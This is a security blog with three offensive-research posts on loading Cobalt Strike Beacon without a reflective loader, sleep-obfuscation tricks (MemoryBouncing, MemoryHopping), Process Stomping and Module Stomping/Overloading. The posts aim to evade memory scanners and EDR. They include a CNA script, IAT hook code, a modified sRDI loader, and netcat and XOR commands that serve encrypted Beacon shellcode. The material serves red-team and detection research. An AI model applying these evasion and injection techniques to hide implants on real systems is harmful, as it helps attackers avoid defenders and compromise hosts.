Naksyn’s blog

Raising Beacons without UDRLs and Teaching them How to Sleep

2024-07-02T00:00:00-04:00

TL;DR
Intro
UDRL-less Beacon generation
UDRL-less Beacon loading
Hook Sleep and prototype stuff
1. PoC || GTFO #1
Memmory Bouncing
1. PoC || GTFO #2
Memory Hopping
1. PoC || GTFO #3
Outro

TL;DR

This journey started because I wanted to a simpler way than Beacon UDRL to experiment with sleep obfuscation techniques.

It turned out that by creating a raw UDRL-less Cobalt Strike Beacon, using a specific cna script, one could use a generic PE loader to execute it by calling the EntryPoint twice and using an undocumented DllMain execution path triggered with a specific dwReason value in the second call.

This allowed a direct IAT Sleep hook on the Beacon and a quicker way to prototye two techniques, dubbed MemoryBouncing and MemoryHopping ,to overcome Elastic EtwTI-FluctuationMonitor tool that bakes a detection for sleep obfuscation techniques that change permissions from RX to RW routinely.

MemoryBouncing is a Sleep obfuscation technique that avoids RX -> RW detection by saving an encrypted copy of the PE, freeing the PE memory while sleeping and allocating it again as RWX before resuming execution. This technique allowed to operate an UDRL-less Beacon being undetected by the tools EtwTI-FluctuationMonitor, CFG-FindHiddenShellcode, Moneta and the latest release (to date) of PE-Sieve with aggressive scan options.

MemoryHopping technique allocates RWX memory always in a different address, requiring the adjustment of the return address and remapping and relocating the PE at each hooked sleep call. Using this technique one must avoid having cross memory references in the payload otherwise an execution exception will be generated after the memory hop because the memory address referenced has been freed.

The PoC for the techniques are included in the DojoLoader project available on my GitHub and can be useful to quickly prototype and test Sleep obfuscation techniques.

Intro

UDRLs with Beacon are very powerful and allow for the smallest memory footprint for the running Beacon. However, they come with some disadvantages: development is more complex since UDRLs require Position Independent Code, and debugging can be so challenging it might feel like it ages you decades. Starting from Cobalt Strike 4.9.1 a new feature that allows Beacon to be exported without UDRL has been released, however, in this blogpost one can read: “[this feature brings] the ability to export Beacon without a reflective loader which adds official support for prepend-style UDRLs”.

What about non-prepend style UDRLs like a generic PE loader?

Even though I might not get official support for generic PE loaders (why not though?) and given that UDRLs are better operational tools, it sounded a nice capability to have at hand.

As per my current understanding, following are the pros and cons of using UDRLs and generic PE loaders to load a Beacon:

UDRLs:

PRO: Smallest malicious memory footprint - all malicious code can be encrypted
PRO: Best usage for process injection (shellcode blob one can just execute)
CON: increased development complexity
CON: increased debugging complexity
CON: size constraints
CON: reliance on dedicated thread to execute Beacon, asynchronous calls and timer queues to perform sleep obfuscation operations.

Generic PE Loaders:

PRO: Simplified development and debugging
PRO: can do a broader range of sleep obfuscation operations because the loader can access Beacon’s memory directly.
PRO: no size limit
PRO: can avoid creating new thread to run the beacon
CON: Bigger malicious memory footprint - Beacon can be encrypted but PE loading code cannot be encrypted as easily
CON: far less suitable for injection than shellcode

The higher number of PROs for PE loaders does not mean they are better for stealth operations than UDRLs, but PE loaders can still have use cases.

To my knowledge, before Cobalt Strike version 4.9.1 it wasn’t possible to export a Beacon without bringing its own stock loader. This means that the “Stageless Windows Payload” generated in raw format is essentially a dll that will in turn load beacon once executed. We’ll refer to that as “stock raw beacon payload” within this blogpost. Loading the stock raw beacon payload leaves lots of artifacts in memory: (see picture below), and one way to avoid that is to use custom UDRLs.


Moneta output for a stock beacon

Indeed, UDRLs allow to get rid of the stock loader and allow also dynamic IAT hooking to do sleep obfuscation and other evasive techniques, without using the SleepMask.

Doing dynamic IAT hooking while loading the stock raw Beacon payload will not hook the sleep API of the real Beacon, because its imports will be resolved by the “internal” loader embedded in the dll, not by the loader that you will use to inject the stock beacon dll. This is an issue described in the shellcode fluctuation project by Mariusz Banach (mgeeky), where he had to hook the Sleep API in the kernel32.dll, instead of doing it dynamically, to effectively intercept the Beacon sleep calls while hitting kernel32.dll.

However, after version 4.9.1 one could export a Beacon without UDRL, get rid of the stock loader artifacts left in memory and dynamically hook the APIs exported by the raw Beacon e.g. to implement obfuscation without a SleepMask. We can also avoid creating a new thread and live onto the main loader’s thread.

UDRL-less Beacon generation

I won’t try to explain how URDLs works since there are amazing blog posts available here and here, so please have a look at them if you need a refresher. Essentially, I needed to use a Beacon that is not “wrapped” by an UDRL so that I can directly hook API calls from the payload after having it mapped in memory. I couldn’t make the cna snippet from Fortra blogpost work to generate an UDRL-less Beacon, so after a bit of sifting through Cobalt Strike documentation and some fails I came up with this CNA:

# ------------------------------------ 
# $1 = DLLfilename 
# $2 = arch 
# ------------------------------------ 
 
set BEACON_RDLL_SIZE { 
    warn("Running 'BEACON_RDLL_SIZE' for DLL " .$1. " with architecture " .$2);    
    return "0"; 
}

set BEACON_RDLL_GENERATE {
    local('$arch $beacon $fileHandle $ldr $path $payload');
    $beacon = $2;
    $arch = $3;

    # Apply the transformations to the beacon payload
    $beacon = setup_transformations($beacon, $arch);
	
    return $beacon;
    }

After loading this CNA and generating a payload (Payloads -> Windows Stageless Payloads -> Output:Raw) we can see the differences in the stock payload in the following figures:


stageless stock Beacon payload generated without cna


imports of a Beacon without UDRL

We can see that the stock beacon payload isn’t even parsed as a valid PE because it essentially is a blob of position independent code that initializes and runs the Beacon payload. On the other hand, the payload generated with our CNA script gives us a valid PE with some interesting imports such as WinHTTP. Indeed, WinHTTP is the library chosen as HTTP library during payload generation, and the fact that it’s included as an import entry is a sign that we are dealing with the unwrapped (by UDRL) Beacon payload.

UDRL-less Beacon loading

After initially failing to load the UDRL-less Beacon payload for no apparent valid reason I began investigating what was going on. What I found is that there are essentially two different execution paths that are triggered by calling the dll entrypoint with fdwReason value 1 (DLL_PROCESS_ATTACH) and 4.


UDRL-less Beacon Dllmain execution paths

The execution branches that the flow will take if using fdwReason 1 or 4, lead to subroutines starting at address 0x1800CA74 and 0x18001A580 respectively.


different subroutines called if different fdwReason value is used

It’s clear now that the UDRL-less Beacon should be loaded by calling the entrypoing using fdwReason 1 and 4, but in which order? And what are the subroutine doing actuallly?

After some debugging I found that the subroutine starting at 0x1800CA74 is responsible for single-byte xoring of the 0x1800 bytes of Beacon configs


subroutine responsible for config singlebyte-xoring called after using fdwReason 1

On the other hand, the subroutine starting at 0x18001A580 contains a function block at 0x18000CD44 that gets hit after the sleeptime to reach the C2 set in the malleable profile. This subroutine uses some of the cleartext configuration parameters after the single-byte xor has been applied by the subroutine at 0x1800CA74.


one of the subroutines responsible for C2 polling


Decrypted Beacon configs used in the routine at address 0x18000CD44

It is now clear that in order to successfully load a UDRL-less Beacon we should call the Dllmain entrypoint such that the configuration gets decrypted (fdwReason 1) and subsequently used to poll the C2 (fdwReason 4). Including this logic in a generic PE loader that uses MemoryModule to map the dll in memory and execute it, will allow us to map the UDRL-Less Beacon payload.

Hook Sleep and prototype stuff

In order to load a UDRL-less Beacon I created the project DojoLoader, it is a generic PE loader that you can use also to prototype with sleep obfuscation as covered later in the post.

Dojoloader uses the MemoryModule implementation of the DynamicDllLoader project by ORCA000, I added modularity and some features like:

download and execution of (xored) shellcode from HTTP
dynamic IAT hooking for Sleep function
three different Sleep obfuscation techinques implemented in the hook library

Executing a UDRL-less beacon by itself is not very useful if you’re not trying to hide a little bit. However, we are now resolving dynamically the imports of a UDRL-less beacon so we can hook the Sleep function used by the Beacon and apply our obfuscation techniques.

PIMAGE_IMPORT_BY_NAME thunkData = MakePointer(PIMAGE_IMPORT_BY_NAME, pMemModule->lpBase, (*thunkRef));
                *funcRef = GetProcAddress(hMod, (LPCSTR)&thunkData->Name);
                printf("[+] Function Name: %s, Address: %p\n", thunkData->Name, *funcRef);

                // Check if the function should be hooked
				if (Configs.SleepHookFunc != NULL) {
                    if (check_hook((LPCSTR)&thunkData->Name)) {
                        printf("[+] Hooking function: %s\n", thunkData->Name);
                        *funcRef = Configs.SleepHookFunc;
                    }

After applying a simple RW -> encrypt -> Sleep -> decrypt -> RX scheme as our sleep obfuscation we should have no artifacts shown by Moneta. Indeed, Moneta is not alerting on memory anomalies, however, this “old” technique cannot get past the latest PE-Sieve and EtwTI-FluctuationMonitor

PoC || GTFO #1

Here’s a video using Dojoloader to load an UDRL-less Beacon payload, hooking Sleep and applying a RW -> encrypt -> Sleep -> decrypt -> RX sleep obfuscation scheme:

Memmory Bouncing

I find DojoLoader useful to prototype and test sleep obfuscation techniques directly on a UDRL-less beacon so I thought about couple ways to circumvent EtwTI-FluctuationMonitor and CFG-FindHiddenShellcode.

John Uhlmann (@jdu2600) in its Black Hat Asia presentation hinted that one could potentially jump at a new location at every time to circumvent the EtwTI-FluctuationMonitor detection. @shubakki in its blogpost also describe a clever way to circumvent the detection by behaving like properly JIT memory Allocate(RW) -> memcpy(code) -> Protect(RX) -> execute [-> Free]

To me, one of the simplest Sleep hook function that could avoid the RX -> RW detection does the following:

Copy mapped PE to a buffer and encrypt it
Free mapped PE address
do sleep time (e.g. SleepEx)
Allocate RWX address on the same address were PE was mapped
decrypt the buffer and copy it over the RWX memory

I like to call this technique MemoryBouncing and although it might not be the stealthiest chain because of the RWX allocation, it avoids using VirtualProtect altogether, so YMMV. Interestingly, This technique allowed to operate an UDRL-less Beacon undetected by the tools EtwTI-FluctuationMonitor, CFG-FindHiddenShellcode, Moneta and the latest release (to date) of PE-Sieve with aggressive scan options. Even though DojoLoader does not include (still) stack spoofing techniques, the stack address would point to an invalid address if inspected during sleeping, because the PE memory has been freed.

PoC || GTFO #2

Here’s a video showing MemoryBouncing using an UDRL-less Beacon payload against EtwTI-FluctuationMonitor and CFG-FindHiddenShellcode (the scan was pretty lengthy):

Memory Hopping

Another approach to circumvent RX -> RW detection would be, as @jdu2600 hinted in his presentation, to allocate RWX always on a different address, but in this case there are some things to take into consideration:

since we’re not dealing with shellcode or PIC, PE relocations need to be calculated at each change of memory
the return address needs also to be adjusted at each change.
payload memory allocations would need to be hooked and deal with the issues of always moving in memory (broken pointer references) or use a payload that is natively compatible with this technique.

After the hook is hit this technique will perform the following steps:

save the return address
copy the mapped PE bytes to a buffer and optionally encrypt it
Free the memory of the mapped payload
allocate RWX memory on a different address
calculate delta and adjust the return address accordingly
copy bytes from the buffer to the newly created memory region
perform relocations on the copied bytes
resume execution form the adjusted return address

PoC || GTFO #3

I dubbed this technique MemoryHopping and as a PoC I used a test program that connects via socket, prints via stdout and sleeps. In the following video we can see how DojoLoader is hooking the Sleep function and remapping the PE at a new address (linearly incremented) every time the hook it’s hit, properly adjusting the return address before resuming execution.

Outro

RX->RW detections can detect a wide range of sleep obfuscation techniques and attackers need to find more creative ways to hide a beacon in memory while sleeping. This post described an attempt in that direction using a PE generic loader to quickly prototype and test ideas that can then be further improved and engineered if deemed worthy.

Mockingjay revisisted - Process stomping and loading beacon with sRDI

2023-11-18T00:00:00-05:00

TL;DR
Credits
Intro
Process Stomping
using sRDI to load a Beacon on an RWX process’ section
Putting it all together: sRDI — Reflective-Loaderless Beacon — Process Stomping
Outro

TL;DR

Original Mockingjay technique abuses dll with RWX sections to obtain a stealthier way to inject malicious code, basically by avoiding the creation of dynamic memory allocation and avoiding the usage of virtualprotect, since RWX is already what we need. The same reasoning can be applied also to executables with RWX sections because we can:

start the executable in a suspended state.
write some shellcode on the RWX section.
resume the thread on the desired entry point.

This technique, dubbed Process Stomping, is a variation of hasherezade’s Process Overwriting and it has the advantage of writing a shellcode payload on a targeted section instead of writing a whole PE payload over the hosting process address space.

We fell in love with DoublePulsar in 2017 so we wanted to use sRDI with a Reflective-Loaderless payload as shellcode. For this reason we used the recent Cobalt Strike 4.9 feature that allow the generation of a Beacon without a reflective loader and we modified the sRDI project to generate shellcode that will in turn bootstrap the reflective loading of Beacon on the RWX region of the stomped executable.

We tested the injection on a GlassWire executable (x86) that has a section called .themida with RWX permissions and as a final result we got the process running with an injected beacon living in the RWX memory range. This was not a vulnerability on GlassWire side given the fact that every executable with RWX permissions and enough space to host a Beacon would be a good fit.

The technique’s PoC can be found on my github , along with the lightly adapted sRDI project used.

Credits

A huge thank you to:

Aleksandra Doniec (@hasherezade) for Process Overwriting
Nick Landers for sRDI

Intro

Poking around with Moneta I stumbled upon a strange behaviour held by GlassWire that I often use because I find it very useful to spot anomalies and infections.


Moneta output for GlassWire executable

As can be seen on the picture, GlassWire executable has a section named .themida, that immediately recalled the famous packer. The section has a size of around 7600 kB and RWX permissions.

The key element here is that Moneta is alerting “modified code” for the .themida section for the entirety of its size. This is intended behaviour for packers and alike, since packed binaries while on disk and packed, have totally different content when unpacked in memory.

This would be a perfect spot to hide in, since Moneta will alert this exact same behaviour on every GlassWire binary. Notably, there’s also a 64 kB RWX private commit and as a cherry on top, the executable is 32 bit and signed. Double-checking with ProcessHacker and PEBear confirmed the finding.


ProcessHacker Memory view for GlassWire executable


PEbear section view for GlassWire executable

While looking at these interesting characteristics, Mockingjay injection technique immediately came to mind. However, it originally aimed at writing malicious code onto a dll with RWX permissions, not onto a running process’ section. So we decided to investigate if the same Mockingjay principle could be applied also to executables and we wanted to load a beacon onto the mapped RWX section itself, instead of allocating dynamic memory. This post documents the journey to achieve the aforementioned outcome.

Process Stomping

One common way of writing malicious code onto a section’s process is to use some variations of Process Hollowing technique. As a refresher, Process Hollowing uses the following Windows APIs:

CreateProcess - setting the Process Creation Flag to CREATE_SUSPENDED (0x00000004) in order to suspend the processes primary thread.
ZwUnmapViewOfSection or NtUnmapViewOfSection - used to unmap the process memory. These two APIs basically release all memory pointed to by a section.
VirtualAllocEx - used to allocate new memory for malicious code to be written.
WriteProcessMemory - used to write each malicious code to the target process space.
SetThreadContext - used to point the entrypoint to a new code section that it has written.
ResumeThread - self-explanatory.

Process Hollowing has been pretty popular among malware authors for quite a while, in the meantime, some variations of this technique have been published. One notable variation is called Process Overwriting and it avoids the step 2 and 3 by writing the malicious PE over the hosting process memory space (started in step 1). This is how an implanted PE looks like in memory (the host process is calc.exe).


Proocess Overwriting injected PE - taken from hasherezade’s github repository

This is nearly everything we need, except for the fact that we would need to write some shellcode over a specific section and not a PE over the whole hosting process address space right from the base address.

Quite similarly to the Module Stomping counterpart, our aim in Process Stomping is to write some shellcode onto a specific section of a target process that we started in a suspended state. For the purpose of this blogpost, the section will be the one with RWX permissions (.themida in the GlassWire executable) so that we can exploit the generous permissions and the likelihood of being in a quite popular false positive situation for GlassWire.

These are the main steps of the ProcessStomping technique:

CreateProcess - setting the Process Creation Flag to CREATE_SUSPENDED (0x00000004) in order to suspend the processes primary thread.
WriteProcessMemory - used to write each malicious shellcode to the target process section.
SetThreadContext - used to point the entrypoint to a new code section that it has written.
ResumeThread - self-explanatory.

The main difference between the existing ProcessOverwriting technique and ProcessStomping is that the former writes the target process’ memory space starting from the top of it, with a PE, on the other hand, ProcessStomping is used to write shellcode only onto a specific section of the target process. We can then add a bit more juice by asking ourself this question:

It’s a waste of an opportunity to stomp on an executable with a native RWX section using some shellcode that will then dynamically allocate our payload. Why not let our payload live within the RWX section instead?

using sRDI to load a Beacon on an RWX process’ section

In order to reach our objective and make our payload live into the RWX section of the target process that we want to stomp, we can combine the new Cobalt Strike 4.9 feature of exporting Beacon without a Reflective Loader and using sRDI project as a prepended loader for Beacon. For those unfamiliar with sRDI, it can essentially be seen as a tool that turns dlls into position independent shellcode also on the fly.

Executed sRDI shellcode will load the dll using Reflective Injection and it can provide some very useful addendums to the original Stephen Fewer’s technique, such as access to the shellcode location and argument passing.

Since sRDI is using VirtualAlloc to load the dll and VirtualProtect to finalize sections, we commented out the relevant codeblocks and set the base address for the subsequent dll loading as the written shellcode location (within .themida section) plus an applied offset. In this way the dll will be loaded onto the section itself rather than on a dynamically allocated memory space and we will be maintaining a whole RWX section because Virtualprotect won’t be called after the dll’s sections are written.

	// Commented VirtualAlloc codeblock
	/*baseAddress = (ULONG_PTR)pVirtualAlloc(
		(LPVOID)(ntHeaders->OptionalHeader.ImageBase),
		alignedImageSize,
		MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE
	);

	if (baseAddress == 0) {
		baseAddress = (ULONG_PTR)pVirtualAlloc(
			NULL,
			alignedImageSize,
			MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE
		);
	}*/
	const size_t offset = 500 * 1024;  // 500 kB chosen offset from shellcode location - adapt it to your needs
	baseAddress = (ULONG_PTR)pvShellcodeBase + offset;
	
	[...]
	
	// Commented VirtualProtect codeblock
	/*
	pVirtualProtect(
		(LPVOID)(baseAddress + sectionHeader->VirtualAddress),
		sectionHeader->SizeOfRawData,
		protect, &protect
	);
	*/
	

There’s one more thing to address, if we create a process in suspended state and then write something onto an RWX section, we’ll have PAGE_EXECUTE_WRITECOPY (WCX on ProcessHacker) permissions on the section’s areas that are not written, and this will leave a non-homogeneous RWX section. As per microsoft documentation:

PAGE_EXECUTE_WRITECOPY enables execute, read-only, or copy-on-write access to a mapped view of a file mapping object. An attempt to write to a committed copy-on-write page results in a private copy of the page being made for the process. The private page is marked as PAGE_EXECUTE_READWRITE, and the change is written to the new page.

This is how the .themida section looks like after the GlassWire process has been started in suspended state:


PAGE_EXECUTE_WRITECOPY of .themida section on process start

If we directly write a shellcode and load a dll payload onto this section this is what we’ll get:


WCX and RWX Mojito cocktail

So to avoid leaving WCX permissions around we can overwrite the whole section once with dummy data in order to get a clean and contiguous RWX section even after the shellcode gets written and the payload is loaded.

For this very same reason of not leaving unnecessary artifacts, we’ll also overwrite the sRDI shellcode blob with dummy data but only after it has been executed and loaded our Beacon in the right RWX section.

The visual representation of what we would like to achieve is depicted in the following figure.


Process Stomping using sRDI to load a payload on an executable’s section

Putting it all together: sRDI — Reflective-Loaderless Beacon — Process Stomping

After compiling the sRDI project with our modifications, some post build actions are performed and their aim is to extract the .text section of the built executable placing it under the bin folder. This is because sRDI code is written as PIC (Position Independent Code) so that it can be executed like shellcode. The next step is to update the newly generated PIC into the sRDI tools used for loading or generating the final shellcode blob:

cd C:\Users\naksyn\sRDI\sRDI-master

python .\lib\Python\EncodeBlobs.py .\

We can now generate a Cobalt Strike Beacon dll without a reflective loader but be sure to generate an x86 payload and you can double check the output on the Script Console to make sure the Beacon dll has been generated correctly.


Cobalt Strike Script Console output during the generation of a Beacon dll without Reflective Loader

The payload dll can now be converted into shellcode. sRDI will prepend its bootstrap in the following way:


sRDI shellcode blob structure - image taken from: https://www.netspi.com/blog/technical/adversary-simulation/srdi-shellcode-reflective-dll-injection/

python ..\Python\ConvertToShellcode.py -b -f "changethedefault" .\noRLx86.dll

The shellcode blob can then be xored with a key-word and downloaded using a simple socket as implemented in the Process Stomping repo

python xor.py noRLx86.bin noRLx86_enc.bin Bangarang

nc -vv -l -k -p 8000 -w 30 < noRLx86_enc.bin

Here’s a video demonstration:

After running Moneta against the injected process we get these results:


Moneta output against the injected process

We can see that the .themida section has RWX permissions for the whole size of it and that there’s a thread started from an offset because we resumed the main thread starting at the shellcode address.

Outro

Executables with RWX sections can be abused similarly to dlls, but there are differences that may offer better detection opportunities.

In fact, Process Stomping technique requires starting the target process in a suspended state, changing the thread’s entry point, and then resuming the thread to execute the injected shellcode. These are operations that might be considered suspicious if performed in quick succession and could lead to increased scrutiny by some security solutions.

However, as of November 2023, exploiting RWX sections in executables is not a widely abused technique and may allow an attacker to blend in, potentially being dismissed as a false positive, without resorting to the well-known Mockingjay technique applied to DLLs.

By leveraging sRDI or other purposely built custom Reflective Loaders, malicious payloads can be written, loaded, and executed within the available RWX sections. This avoids the need for dynamic memory allocation during both the stages of shellcode and payload execution.

Improving the stealthiness of memory injections techniques

2023-06-01T00:00:00-04:00

TL;DR
Credits
Intro
1. Injection Categories
Improvement Strategy
Module Shifting
Outro

The topic has been presented at x33fcon 2023 Talk - Improving the Stealthiness of Memory Injection Techniques (slide deck is available here)

TL;DR

Injection techniques can be grouped in three main categories:

Code Injection
PE Injection
Process Manipulation

This post focuses on improving Module Stomping and Module Overloading, part of the PE injection techinques, that have been chosen as candidates because they avoid the creation of dynamic memory allocation and perform a common operation (LoadLibrary) that is the cornerstone of the technique.

The public implementation of Module stomping till date are getting “Modified Code” IoC by Moneta because of the stomped code living on the hosting dll.

Moneta will compare the dll bytes on disk with in-memory bytes and the output will be the “Modified Code” IoC. This outcome can be avoided by looking at injection techniques from a higher level and thinking about a proper improvement strategy. In fact, there are several moving parts in an injeciton techniques:

the loader
the injection technique
the payload

If we can keep the payload functionally independent from the stomped bytes, we can restore the stomped bytes and get rid of the “Modified Code” IoC that some module stomping public implementations bring.

Module Overloading, on the other hand, requires having a PE payload living on a “hosting dll” and we cannot revert the copied bytes back to their original value, otherwise this will impair the payload execution.

However, Module Overloading can be improved by choosing the right hosting dll section where to write the payload, and by mimicking some seemingly “strange” behaviour held by windows and third party libraries that overwrite some of their very same PE section, leading to the “Modified Code IoC” with Moneta.

All these improvements led to a modified Module Stomping and Module Overloading technique that has been dubbed Module Shifting. To connect these concepts to my previous Python research I developed the PoC in Python ctypes such that it can be used dynamically with Pyramid.

Credits

A huge thank you to the amazing people that published knowledge and tools instrumental to this work:

Aleksandra Doniec (hasherezade) for Module Overloading, PE-Sieve, PE-Bear and for technical discussions
Forrest Orr for Moneta and his Memory Evasion blog series.
Kyle Avery for AceLdr
Fsecure and Bobby Cooke for their public Module Stomping implementation (1)(2)

Intro

The purpose of the post is to improve some injection techniques, so to better understand the process involved we’ll try to answer the following questions:

What’s important to know about an injection and how can we choose between the myriad of available techniques
How can we test the stealthiness and define a benchmark
How can we improve an injection technique.

In the realm of Offensive Cybersecurity, injection techniques play a pivotal role in various malicious activities.

These techniques involve the insertion of code or payloads into the memory space of legitimate processes, often enabling attackers to execute arbitrary actions covertly.

Among the various techniques, three main categories stand out: Code Injection, PE Injection, and Process Manipulation.

In this post, we will delve into the domain of PE Injection, focusing specifically on two advanced techniques: Module Stomping and Module Overloading. Module Stomping and Module Overloading are intriguing techniques within the realm of PE Injection due to their ability to sidestep dynamic memory allocation and rely on a fundamental operation known as LoadLibrary.

These techniques, while effective, have been scrutinized for leaving traces that can be detected by advanced security tools like Moneta. Moneta’s detection mechanism involves comparing on-disk DLL bytes with in-memory bytes, effectively flagging modified code as an Indicator of Compromise (IoC). This post addresses the challenges posed by these techniques and presents an innovative approach to enhance their stealth and effectiveness.

Injection Categories

Since our aim is to improve the stealthiness of injection techniques, we’ll try to group the injection technique in categories and having a focus on the IoCs that are most commonly left by techniques in a same group. This is by far not a comprehensive description of every injection techniques but the purpose is to provide some high-level overview so that we can better identify promising injection techniques to improve. If you need a more detailed overview, the Blackhat 2019 presentation - Process Injection Techniques: Gotta Catch Them All can be beneficial.

Code Injection

techniques included in this group insert and execute malicious code within a target process’s memory, typically involving dynamic memory allocation. Some of the most common techniques in this group are:

Classic shellcode injection:
- Allocate memory in the target process
- Write malicious code into the allocated memory
- Create a remote thread or execute via callback functions
APC injection:
- Allocate memory in the target process
- Write malicious code into it
- queue APC
- Resume thread execution
Hook Injection
- Intercept API calls made by the target process
- Redirect the intercepted API calls to the malicious code
Thread Local Storage injection
- modify the target process’ PE header (TLS callback function)
- Execute the injected code as a TLS callback
Exception-Dispatching Injection
- Allocate memory in the target process
- write malicious code into it
- modify the target process’ exception handler
- Trigger an exception in the target process

The most prevalent IoC for the techniques listed in this group is the Dynamic memory Allocation, usually made by VirtualAlloc and HeapAlloc API calls, and subsequent changes in memory permissions (RWX, RW then RX, etc.) There are also technique-specific IoCs that are generated by some techniques, but they are very peculiar and can generally be fingerprinted by security vendors once a technique becomes public, so for that matter we are mostly interested in the common IoCs shared by most of the techniques in a group, so that we have a simpler map of an injection category and traces left by most of the techniques.

PE Injection

Techniques included in this group inject a Portable Executable (PE) file such as dlls or exes into the address space of a running process. Some of the most common techniques in this group are:

Classic dll injection:
- Drop dll on disk
- allocate memory to target process and write malicious dll
- Load dll using LoadLibrary or similar method
Reflective dll injection
- Reflective loader is part of the malicious dll
- the loader loads and map the malicious dll into target process without actually calling LoadLibrary or other Windows API.
- Resolve dependencies and perform relocations
MemoryModule
- similar to reflective dll injection but the loader code is external and not embedded in the dll itself.
- this technique is more flexible since it allows the loading of unmodified dlls.
Module Stomping
- Load a dll into the target process
- Overwrite dll’s section/s with shellcode and execute it
Module Overloading
- Load a dll into the target process
- Overwrite loaded dll memory space with malicious PE

By injecting a PE, we are requiring that PE to run on the overwritten dlls’ bytes and this would typically mean that the PE is a “final” payload that does not load or execute further stages. On the other hand, by using shellcode (i.e. Module Stomping) an attacker can craft a more stealthier approach by using a shellcode that is loading a final payload in another area of memory. As we’ll see later in the post, this is a key property that enables some improvements in the injection technique.

Injection techniques in this group mostly leverage, or mimic, a normal dll loading operation such as LoadLibrary. This is a key element that can provide an avenue for attackers to better blend into environments while injecting.

Process Manipulation

Techniques included in this group are used to manipulate or modify the memory and execution context of running processes, libraries, or creating new processes with malicious payloads. Some of the most common techniques in this group are:

Process Hollowing:
- Create process in suspended state
- Replace memory contents with malicious executable
- Resume execution
Process doppelgänging
- Abuse NTFS transactions to load a malicious executable within the context of a legitimate process
Sideloading
- Drop dll on disk
- Abuse windows dll search order or missing dlls to load a malicious dll into a legitimate process
Thread Execution Hijacking
- Suspend a thread in the target process
- Modify instruction pointer to execute malicious code

The most prevalent IoCs generated by these techniques are alterating the context or normal execution flow of a PE (suspend execution state, abuse dll search order).
While this category contain some very powerful techniques, such as sideloading, we might want to first look for techniques that leverages mostly legitimate process’ operations and do not alter execution flow, in order to get more chances of blending into an environment without standing out as odd behaviour.

Improvement Strategy

Before diving into the improvement phase, we should have a proper strategy under our sleeves since the injection technique is not a single element but it is part of a chain composed by the injection technique, loader and the payload as their main moving parts.

The most prevalent IoC for these techniques is that the PE (dll or exe) or shellcode, is residing in memory of a (legitimate) loaded dll. This will lead to a mismatch between in-memory bytes and on-disk dll’s bytes caused by the overwriting of the loaded dll memory space with malicious code.


Moving parts of an injection Technique

Moving Parts - Injection technique

The injection technique should not be seen as an isolated element, because its choice can be influenced by the payload or the loader. For example, if your payload to be injected is a PE, you’ll basically limit your injection options to the PE injection category. Similarly, if you choose to use an embedded loader to load a dll, you’re narrowing down to reflective dll injection.

An attacker should choose an injection technique primarily based on operational considerations, some common drivers might be:

use an injection to emulate a predefined Threat Actor.
choose an injection that is more likely to blend into an environment
use an injection that can bypass a the security solution the attacker is up against (not necessarily blending into the environment).

We are mostly interested in blending into an environment, because this can bring the broadest operational depth. For this reason, two key features that the Injection technique should have are:

Avoidance of dynamic memory allocation (via VirtualAlloc or HeapAlloc).
Usage of a legitimate process operation

Looking for injection techniques techniques with these characteristics we can recall from the Introductory overview that Module Stomping and Module Overloading are two injection techniques that leverage the legitimate LoadLibrary operation to avoid dynamic memory allocation such that malicious shellcode or PE can be written over the loaded dll memory space.

For this reason we chose to target Module Stomping and Module Overloading and look for ways to improve them.

Moving Parts - Loader

The purpose of the loader is to execute the injection technique itself, eventually loading and executing a payload. There are mainly three types of loaders:

embedded - the loader is part of the payload (usually a PE). For example, reflective dll injection uses an embedded loader that is coded in the dll and bootstraps the loading process of the dll itself.
external - the loader is not part of the payload, it’s typically a standalone PE that gets a shellcode, BOF or PE as input payload and kicks off the injection technique. The payload can be written within a section of the loader itself or can be downloaded/read from disk/pipe.
interpreted - this loader is coded in an interpreted language and executed by the code interpreter. This kind of loaders do not need a purposely compiled PE to run and can be executed in memory by the interpreter that need to be present or dropped on the target.

Building upon my previous Python research, our strategy is adopting an interpreted loader because we’ll want to avoid the generation of suspicious PE loaders that generally have a very short life-span can be easily fingerprinted and leverage the powerful evasion properties that Python brings to the game:

Python embeddable package comes with a signed interpreter that can be dropped on the target
Coding the loader using Python ctypes allows to dynamically execute wrapped C language code via Python. We can essentially execute any Windows API using Python via the signed interpreter.
Combining Python with Pyramid allows to in-memory import Python modules and execute complex operations entirely in memory.
We can avoid the usage of compiled PE for injection.
We can avoid AMSI inspection (there’s no AMSI for Python) and AV/EDR inspection of dynamic Python code (there’s no introspection for dynamic Python code).

Moving Parts - Payload

The final stage of an injection technique is to achieve payload execution, that’s essentially code to be run on a target machine. In the context of Memory Injection, payloads can come in the form of:

PE (executables or dlls)
Position Independent Code (Shellcode, BOFs, etc.)

PE payloads are usually less flexible than shellcode because of their size (PE Header and sections’ overhead) and they’re also rarely used to stage further malware, instead they’re often intended as “final” payloads containing the core of the malware. Furthermore, the size constrait make PE an unviable candidate for injection techniques where little space is available.

On the other hand, shellcode has more flexibility and evasion properties:

Shellcode can be used to load further stages payloads (even a PE) and can be made independent from final payloads, meaning that once the shellcode loaded and started the final payload, it can be erased without impairing the functionality of the final payload itself.
Shellcode can be shrank (using stagers for example) to fit small space constraints.
Position Independent Code payloads can be obfuscated at the assembly level

For this reasons we’ll choose shellcode as payload and to make it independent from further stages we’ll use a stageless Cobalt Strike generated with AceLdr shellcode.

AceLdr shellcode will load a copy of Beacon on the Heap and it’ll apply advanced in-memory evasion techniques. The scope of this blogpost is improving the injection technique rather than the payloads, so we’ll be focusing on the artifacts that the injection technique is leaving behind.

Testing with memory scanners

In the realm of cybersecurity, understanding and mitigating novel threats is paramount. For this purpose, great professionals like Aleksandra Doniec and Forrest Orr published Moneta and Pe-Sieve, that are state-of-the-art publicly available memory scanners designed to detect sophisticated memory-based attacks.

Moneta excels in identifying the presence of dynamic/unknown code and suspicious characteristics of the mapped PE image regions, which are often telltale signs of an attack. On the other hand, Pe-Sieve is designed to identify suspicious memory regions based on malware IOCs and uses a variety of data analysis tricks to refine its detection criteria. These tools were originally designed for defenders, but could be also used by attackers to improve their craft.

When we delve into the intricacies of memory injection techniques like Module stomping and Module overloading, both these tools become instrumental. By utilizing these scanners, we can identify the improvement opportunities in these injection techniques, making it possible to enhance their efficiency when deploying shellcode and ensuring they remain undetected by modern defense mechanisms.

Having these tools at hand is also beneficial infinding some weird common behaviours that we can use to our advantage to better blend in. For example, running Moneta on all processes on a Windows 10 Operating system and inspecting its results, can lead to interesting findings.

